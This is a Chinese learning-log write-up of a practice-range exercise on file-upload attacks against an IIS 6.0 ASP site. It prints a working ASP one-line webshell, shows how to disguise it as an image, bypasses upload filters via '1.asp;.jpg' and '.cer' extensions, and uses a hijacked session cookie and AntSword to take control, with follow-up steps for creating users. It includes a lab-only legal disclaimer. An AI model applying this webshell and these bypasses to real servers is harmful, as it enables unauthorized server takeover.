未知攻,何知守。
进行网络安全实践操作时,必须遵守网络安全法。
网络安全法全文(必看)https://zhuanlan.zhihu.com/p/27336286
以下过程均为靶场进行。
什么是中间件?
中间件(Middleware)是提供系统软件和应用软件之间连接的软件,以便于软件各部件之间的沟通。中间件处在操作系统和更高一级应用程序之间;我们可以理解为:是一类能够为一种或多种应用程序合作互通、资源共享,同时还能够为该应用程序提供相关的服务的软件。
首先要了解中间件的类型:
主要有IIS、Apache、Nginx、Tomcat、shiro、WebLogic以及其它类型。
以上类型的介绍:基础知识篇 | 应急响应之中间件漏洞
文件上传的作用:
获取目标服务器的权限,进而控制目标服务器。
任务如下:
点击传送门结果如下图 :
1、首先使用之前XSS打到的cookie进行身份位置,登录目标后台。
cookie:ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC
ADMINSESSIONIDCSTRCSDQ是cookie的名称,LBMLMBCCNPFINOANFGLPCFBC是cookie的值。
打开浏览器设置,进入Web开发者模式,进入存储修改cookie,把名称和值填入,点击准备好了吗? 进入目标后台:
进入目标后台之后,寻找可以进行上webshell(后门)的地方。一般来说,上传图片(头像),上传文件是比较简单且常用的方法。
找到产品管理的产品类别,进行修改产品的图片,上传我们的webshell。
制作我们的一句话:由于是网站是ASP,我们百度搜索ASP一句话,进行木马的制作。
asp一句话:<%execute(request("1"))%>(密码是1)
我们制作1.asp文件(创建txt文档,把搜索到的一句话进行粘贴,修改后缀为.asp),最简单的一句话木马就制作完成了。
2、进行文件的上传
发现文件上传存在过滤:
我们尝试制作图片码进行绕过(因为图片码后缀符合要求),随便找一个图片(名称为2.jpg),和我们的1.asp文件放在同一个文件夹,在文件上方输入cmd,出现命令控制行,输入copy 2.jpg /b + 1.asp /a 12.jpg
图片码制作完成后,继续进行文件上传(上传的是我们制作的12.jpg图片码):
打开远程连接工具,进行连接,例如:菜刀,蚁剑等,本次使用蚁剑。
4、右键点击空白处,添加数据
输入网址为 http://dl9k8005.ia.aqlab.cn/UploadFiles/202283115243633.jpg(后面的202283115243633.jpg每次上传都是不一样的,我们上传图片是文件上传的根目录,所以网址是这个)
进行添加,密码为:1(之前一句话设置的),asp类型。
添加成功:
尝试连接,出现如下报错(405),这是因为jpg文件不解析,后缀是图片格式,所以服务器会当做一张图片去读取,而不是代码。报错信息里面写了iis6.0的中间件。百度下iis6.0的解析漏洞,就能发现上传cer文件,iis6.0会解且执行。
注意:把文件后缀修改为cer时,内容只有一句话,文件太小,会出现无法上传的情况,我们以记事本方式打开,随便添加内容,大小为2-3KB左右时即可上传成功。
文件上传成功,我们修改URL并进行保存:
添加成功进行连接:
完成靶场要求:
总结:
1、明白cookie的概念,会修改cookie;
2、进入后台要知道找到文件上传的地方或者其它可以留后门的途径;
3、上传后门文件的方法;
要解决的问题:
1、上传文件时,文件被过滤了如何解决?
修改合适的格式进行上传,例如图片码;
或者:1.asp;.jpg
2、文件上传成功后如何连接?
连接路径应该是:上传文件的路径
3、连接报错怎么解决?
使用搜索引擎解决;
例如出现报错有:{} 一般是密码错误 或者修改一句话就可以解决(本次我就遇到了这个问题)
4、如何隐藏上传的后门?
正在学习;
5、完成以上工作后,下一步干嘛?
找到cmd.exe运行,创建用户,进行远程登录尝试控制该服务器,没有权限就自己上传cmd.exe文件。
免责声明:
以上内容为学习记录,如有错误欢迎指正。
本文章内所有工具、技术 仅限于封神台靶场使用,请勿用于未授权的违法攻击!! 用户滥用造成的一切后果自负!! 使用者请务必遵守当地法律!!
推荐文章
发表评论